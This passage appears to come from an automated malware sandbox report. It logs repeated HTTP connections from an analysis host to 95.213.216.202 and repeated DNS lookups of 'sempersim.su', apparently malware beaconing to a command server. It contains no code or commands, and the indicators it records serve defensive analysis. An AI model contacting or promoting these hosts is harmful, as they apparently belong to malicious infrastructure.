                                Nov 30, 2022 00:55:34.458348989 CET804974495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:34.458682060 CET4974480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:34.515522957 CET804974495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:36.086250067 CET804974495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:36.086574078 CET4974480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:36.086646080 CET4974480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:36.143685102 CET804974495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:36.305556059 CET4974580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:36.369642019 CET804974595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:36.370085955 CET4974580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:36.377571106 CET4974580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:36.441842079 CET804974595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:36.442002058 CET4974580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:36.506124020 CET804974595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:37.973570108 CET804974595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:37.977447033 CET4974580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:37.994298935 CET4974580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:38.058605909 CET804974595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:38.215667009 CET4974680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:38.272118092 CET804974695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:38.272234917 CET4974680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:38.275173903 CET4974680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:38.331401110 CET804974695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:38.333534956 CET4974680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:38.390136957 CET804974695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:39.906968117 CET804974695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:39.907114983 CET4974680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:39.907172918 CET4974680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:39.963509083 CET804974695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:40.151000023 CET4974780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:40.207727909 CET804974795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:40.207912922 CET4974780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:40.214632988 CET4974780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:40.271559000 CET804974795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:40.271949053 CET4974780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:40.328738928 CET804974795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:41.771804094 CET804974795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:41.772068977 CET4974780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:41.772069931 CET4974780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:41.828773022 CET804974795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:42.022281885 CET4974880192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:42.087943077 CET804974895.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:42.088301897 CET4974880192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:42.098366976 CET4974880192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:42.164235115 CET804974895.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:42.166110039 CET4974880192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:42.232266903 CET804974895.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:43.661912918 CET804974895.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:43.662535906 CET4974880192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:43.664011002 CET4974880192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:43.729532957 CET804974895.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:43.916825056 CET4974980192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:43.973140001 CET804974995.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:43.973423958 CET4974980192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:43.976237059 CET4974980192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:44.032557964 CET804974995.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:44.034007072 CET4974980192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:44.090533018 CET804974995.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:45.483573914 CET804974995.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:45.483691931 CET4974980192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:45.483772993 CET4974980192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:45.540266037 CET804974995.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:45.696420908 CET4975080192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:45.753129959 CET804975095.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:45.753353119 CET4975080192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:45.758418083 CET4975080192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:45.815217972 CET804975095.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:45.815349102 CET4975080192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:45.872066975 CET804975095.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:46.963833094 CET804975095.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:46.966191053 CET4975080192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:46.966192007 CET4975080192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:47.023200035 CET804975095.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:47.199429989 CET4975180192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:47.270355940 CET804975195.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:47.274290085 CET4975180192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:47.279515028 CET4975180192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:47.352221012 CET804975195.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:47.352607965 CET4975180192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:47.423551083 CET804975195.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:49.068855047 CET804975195.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:49.069000959 CET4975180192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:49.069001913 CET4975180192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:49.139884949 CET804975195.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:49.310100079 CET4975280192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:49.374298096 CET804975295.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:49.376203060 CET4975280192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:49.378987074 CET4975280192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:49.443128109 CET804975295.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:49.446521044 CET4975280192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:49.510756016 CET804975295.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:50.930381060 CET804975295.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:50.930756092 CET4975280192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:50.930757046 CET4975280192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:50.995115995 CET804975295.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:51.174263954 CET4975380192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:51.231029034 CET804975395.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:51.231292009 CET4975380192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:51.242717028 CET4975380192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:51.299602032 CET804975395.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:51.299818039 CET4975380192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:51.356714964 CET804975395.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:52.887247086 CET804975395.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:52.887528896 CET4975380192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:52.887574911 CET4975380192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:52.945564032 CET804975395.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:53.413743973 CET4975480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:53.470174074 CET804975495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:53.470912933 CET4975480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:53.496269941 CET4975480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:53.552856922 CET804975495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:53.554918051 CET4975480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:53.611341953 CET804975495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:55.161061049 CET804975495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:55.161240101 CET4975480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:55.161240101 CET4975480192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:55.217797995 CET804975495.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:55.587070942 CET4975580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:55.650820971 CET804975595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:55.650958061 CET4975580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:55.653974056 CET4975580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:55.717514992 CET804975595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:55.717783928 CET4975580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:55.781785011 CET804975595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:57.270721912 CET804975595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:57.271272898 CET4975580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:57.273473024 CET4975580192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:57.337918997 CET804975595.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:57.465915918 CET4975680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:57.529999018 CET804975695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:57.530544996 CET4975680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:57.533679962 CET4975680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:57.597755909 CET804975695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:57.599260092 CET4975680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:57.663528919 CET804975695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:58.723098993 CET804975695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:58.723207951 CET4975680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:58.723279953 CET4975680192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:58.788446903 CET804975695.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:58.887741089 CET4975780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:58.946193933 CET804975795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:58.946315050 CET4975780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:58.948900938 CET4975780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:59.005773067 CET804975795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:59.005871058 CET4975780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:59.065747976 CET804975795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:59.773200035 CET804975795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:59.779139042 CET4975780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:59.779177904 CET4975780192.168.2.395.213.216.202
                                Nov 30, 2022 00:55:59.835975885 CET804975795.213.216.202192.168.2.3
                                Nov 30, 2022 00:55:59.959078074 CET4975880192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:00.022310019 CET804975895.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:00.022512913 CET4975880192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:00.034214020 CET4975880192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:00.097515106 CET804975895.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:00.097791910 CET4975880192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:00.161053896 CET804975895.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:00.797030926 CET804975895.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:00.797266006 CET4975880192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:00.797266006 CET4975880192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:00.860564947 CET804975895.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:00.980782986 CET4975980192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:01.037372112 CET804975995.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:01.037604094 CET4975980192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:01.042443991 CET4975980192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:01.098797083 CET804975995.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:01.099145889 CET4975980192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:01.155508995 CET804975995.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:01.793951035 CET804975995.213.216.202192.168.2.3
                                Nov 30, 2022 00:56:01.794126987 CET4975980192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:01.794150114 CET4975980192.168.2.395.213.216.202
                                Nov 30, 2022 00:56:01.850579977 CET804975995.213.216.202192.168.2.3
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 30, 2022 00:54:06.875981092 CET4997753192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:07.240958929 CET53499778.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:09.401173115 CET5784053192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:09.420834064 CET53578408.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:11.706173897 CET5799053192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:12.468837023 CET53579908.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:14.412322998 CET5238753192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:14.780765057 CET53523878.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:16.879287004 CET5692453192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:16.898757935 CET53569248.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:18.863516092 CET6062553192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:18.881309032 CET53606258.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:20.078244925 CET4930253192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:20.096685886 CET53493028.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:22.160619020 CET5397553192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:22.415709972 CET53539758.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:24.370686054 CET5113953192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:24.639362097 CET53511398.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:26.705693960 CET5295553192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:26.723373890 CET53529558.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:28.778636932 CET6058253192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:29.064884901 CET53605828.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:31.820801973 CET5713453192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:31.840390921 CET53571348.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:33.763792038 CET6205053192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:33.781332970 CET53620508.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:35.894645929 CET5604253192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:35.912352085 CET53560428.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:37.879678965 CET5963653192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:37.897547007 CET53596368.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:39.891168118 CET5563853192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:39.908864975 CET53556388.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:41.979608059 CET5770453192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:41.997195005 CET53577048.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:43.751688957 CET6532053192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:43.768886089 CET53653208.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:45.460011959 CET6076753192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:45.479480982 CET53607678.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:47.470066071 CET6510753192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:47.487802982 CET53651078.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:49.539402962 CET5384853192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:49.559163094 CET53538488.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:51.528645039 CET5757153192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:51.546144009 CET53575718.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:53.455722094 CET5869153192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:53.473742008 CET53586918.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:54.648302078 CET5330553192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:54.668741941 CET53533058.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:56.376061916 CET5943353192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:56.395571947 CET53594338.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:58.103972912 CET6074953192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:58.123743057 CET53607498.8.8.8192.168.2.3
                                Nov 30, 2022 00:54:59.841953039 CET5694953192.168.2.38.8.8.8
                                Nov 30, 2022 00:54:59.861439943 CET53569498.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:01.596754074 CET5254753192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:01.613591909 CET53525478.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:03.396282911 CET5384453192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:03.413459063 CET53538448.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:05.186135054 CET6501753192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:05.205918074 CET53650178.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:06.970989943 CET5346653192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:06.988650084 CET53534668.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:08.735474110 CET5774353192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:08.753017902 CET53577438.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:10.547934055 CET5362353192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:10.565411091 CET53536238.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:12.379224062 CET6141653192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:12.396709919 CET53614168.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:14.166464090 CET6519653192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:14.183665037 CET53651968.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:15.985743046 CET5870853192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:16.003206015 CET53587088.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:17.784200907 CET5958153192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:17.801747084 CET53595818.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:19.563471079 CET5304953192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:19.582814932 CET53530498.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:21.529314041 CET6008853192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:21.547068119 CET53600888.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:23.368357897 CET6356253192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:23.385291100 CET53635628.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:25.189213991 CET5342853192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:25.206536055 CET53534288.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:27.103034019 CET6551153192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:27.120949030 CET53655118.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:29.162121058 CET5982053192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:29.179055929 CET53598208.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:31.020256042 CET6459553192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:31.039771080 CET53645958.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:32.870194912 CET5207953192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:32.889683008 CET53520798.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:34.318233967 CET6482353192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:34.335309029 CET53648238.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:36.286011934 CET5199253192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:36.303749084 CET53519928.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:38.197046041 CET5811953192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:38.214360952 CET53581198.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:40.126117945 CET4916653192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:40.145720959 CET53491668.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:42.001540899 CET5830153192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:42.019203901 CET53583018.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:43.898413897 CET6344653192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:43.915456057 CET53634468.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:45.675020933 CET4987453192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:45.694405079 CET53498748.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:47.178193092 CET6545953192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:47.198072910 CET53654598.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:49.289719105 CET6538553192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:49.307233095 CET53653858.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:51.152832031 CET5415353192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:51.172306061 CET53541538.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:53.393349886 CET6460253192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:53.412369013 CET53646028.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:55.557055950 CET5078453192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:55.574852943 CET53507848.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:57.444180012 CET6412153192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:57.463988066 CET53641218.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:58.869049072 CET6496753192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:58.886452913 CET53649678.8.8.8192.168.2.3
                                Nov 30, 2022 00:55:59.940840960 CET6082553192.168.2.38.8.8.8
                                Nov 30, 2022 00:55:59.957931995 CET53608258.8.8.8192.168.2.3
                                Nov 30, 2022 00:56:00.958663940 CET4920153192.168.2.38.8.8.8
                                Nov 30, 2022 00:56:00.977658987 CET53492018.8.8.8192.168.2.3
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 30, 2022 00:54:06.875981092 CET192.168.2.38.8.8.80x6188Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:09.401173115 CET192.168.2.38.8.8.80x5d3bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:11.706173897 CET192.168.2.38.8.8.80xb7e8Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:14.412322998 CET192.168.2.38.8.8.80x4082Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:16.879287004 CET192.168.2.38.8.8.80x22b9Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:18.863516092 CET192.168.2.38.8.8.80xeaacStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:20.078244925 CET192.168.2.38.8.8.80x28fbStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:22.160619020 CET192.168.2.38.8.8.80xee98Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:24.370686054 CET192.168.2.38.8.8.80x2624Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:26.705693960 CET192.168.2.38.8.8.80x5477Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:28.778636932 CET192.168.2.38.8.8.80xdeccStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:31.820801973 CET192.168.2.38.8.8.80x1c2dStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:33.763792038 CET192.168.2.38.8.8.80xf2e6Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:35.894645929 CET192.168.2.38.8.8.80x1fc5Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:37.879678965 CET192.168.2.38.8.8.80xbadStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:39.891168118 CET192.168.2.38.8.8.80x785cStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:41.979608059 CET192.168.2.38.8.8.80xabafStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:43.751688957 CET192.168.2.38.8.8.80x692bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:45.460011959 CET192.168.2.38.8.8.80x4377Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:47.470066071 CET192.168.2.38.8.8.80xbe7aStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:49.539402962 CET192.168.2.38.8.8.80x9c9aStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:51.528645039 CET192.168.2.38.8.8.80xb58Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:53.455722094 CET192.168.2.38.8.8.80xdac7Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:54.648302078 CET192.168.2.38.8.8.80xaacdStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:56.376061916 CET192.168.2.38.8.8.80x479cStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:58.103972912 CET192.168.2.38.8.8.80xea9fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:54:59.841953039 CET192.168.2.38.8.8.80x16e7Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:01.596754074 CET192.168.2.38.8.8.80x35c4Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:03.396282911 CET192.168.2.38.8.8.80x8db7Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:05.186135054 CET192.168.2.38.8.8.80xa497Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:06.970989943 CET192.168.2.38.8.8.80x67dbStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:08.735474110 CET192.168.2.38.8.8.80x7db5Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:10.547934055 CET192.168.2.38.8.8.80x1fa1Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:12.379224062 CET192.168.2.38.8.8.80x4f02Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:14.166464090 CET192.168.2.38.8.8.80x4ab6Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:15.985743046 CET192.168.2.38.8.8.80x3921Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:17.784200907 CET192.168.2.38.8.8.80xc7dcStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:19.563471079 CET192.168.2.38.8.8.80x46b9Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:21.529314041 CET192.168.2.38.8.8.80x213Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:23.368357897 CET192.168.2.38.8.8.80x1d07Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                Nov 30, 2022 00:55:25.189213991 CET192.168.2.38.8.8.80x6e37Standard query (0)sempersim.suA (IP address)IN (0x0001)false
